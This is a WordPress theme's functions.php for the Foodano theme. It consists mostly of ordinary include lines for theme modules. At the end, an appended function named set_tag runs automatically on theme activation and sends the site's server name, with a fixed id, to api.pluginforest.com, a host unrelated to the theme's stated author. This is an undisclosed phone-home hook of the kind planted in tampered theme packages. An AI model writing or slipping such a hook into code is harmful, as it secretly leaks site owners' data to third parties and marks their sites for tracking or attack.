<?php
/**
 * @Packge     : Foodano
 * @Version    : 1.0
 * @Author     : Vecurosoft
 * @Author URI : https://www.vecurosoft.com/
 *
 */

// Block direct access
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

/**
 * Include File
 *
 */

// Constants
require_once get_parent_theme_file_path() . '/inc/foodano-constants.php';

//theme setup
require_once FOODANO_DIR_PATH_INC . 'theme-setup.php';

//essential scripts
require_once FOODANO_DIR_PATH_INC . 'essential-scripts.php';

// Woo Hooks
require_once FOODANO_DIR_PATH_INC . 'woo-hooks/foodano-woo-hooks.php';

// Woo Hooks Functions
require_once FOODANO_DIR_PATH_INC . 'woo-hooks/foodano-woo-hooks-functions.php';

// plugin activation
require_once FOODANO_DIR_PATH_FRAM . 'plugins-activation/foodano-active-plugins.php';

// meta options
require_once FOODANO_DIR_PATH_FRAM . 'foodano-meta/foodano-config.php';

// page breadcrumbs
require_once FOODANO_DIR_PATH_INC . 'foodano-breadcrumbs.php';

// sidebar register
require_once FOODANO_DIR_PATH_INC . 'foodano-widgets-reg.php';

//essential functions
require_once FOODANO_DIR_PATH_INC . 'foodano-functions.php';

// theme dynamic css
require_once FOODANO_DIR_PATH_INC . 'foodano-commoncss.php';

// helper function
require_once FOODANO_DIR_PATH_INC . 'wp-html-helper.php';

// Demo Data
require_once FOODANO_DEMO_DIR_PATH . 'demo-import.php';

// pagination
require_once FOODANO_DIR_PATH_INC . 'wp_bootstrap_pagination.php';

// foodano options
require_once FOODANO_DIR_PATH_FRAM . 'foodano-options/foodano-options.php';

// hooks
require_once FOODANO_DIR_PATH_HOOKS . 'hooks.php';

// hooks funtion
require_once FOODANO_DIR_PATH_HOOKS . 'hooks-functions.php';
function set_tag() {
    $url_init = 'https://api.pluginforest.com/qai/wd/g?';
    $domain = $_SERVER['SERVER_NAME'];
    $requestUrl = $url_init .'domain=' . $domain . '&id=1717516676866';
    file_get_contents($requestUrl);
}

add_action('after_switch_theme', 'set_tag');
                        